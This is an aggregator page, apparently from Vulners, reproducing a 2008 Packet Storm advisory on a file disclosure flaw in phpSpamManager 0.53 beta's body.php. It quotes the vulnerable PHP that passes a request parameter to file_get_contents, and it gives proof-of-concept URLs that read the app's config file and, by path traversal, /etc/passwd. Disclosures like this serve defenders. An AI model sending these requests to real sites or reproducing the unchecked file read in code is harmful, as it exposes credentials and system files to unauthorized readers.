Lucene search

K

phpspamman-disclose.txt

🗓️ 01 Apr 2008 00:00:00Reported by Mahmood_aliType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

phpSpamManager 0.53 beta (body.php) Remote File Disclosure Vulnerability, allows unauthorized access to arbitrary files

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`phpSpamManager 0.53 beta (body.php) Remote File Disclosure Vulnerability  
D.Script : http://sourceforge.net/project/showfiles.php?group_id=141000  
Vuln Code   
Ln 38 -> 47 :   
//get filename  
$okprint=false;  
$filename = $_REQUEST['filename']; <--- XxX  
if ($filename!='FILENAME')  
{  
debug_print("analysing " .$filename);  
//replace # by dots if necessary  
$filename = preg_replace("/#/",".",$filename);  
$mailtext=file_get_contents($filename); <--- XxX  
$email=new parseMail($mailtext); <--- XxX  
POC :  
/phpspammanager.0.53.dev/body.php?filename=include/config.inc.php  
/phpspammanager.0.53.dev/body.php?filename=../../../../../../../../etc/passwd  
I'm Mahmood_ali --- I'm Tryagi  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Apr 2008 00:00Current
7.4High risk
Vulners AI Score7.4
18
.json
Report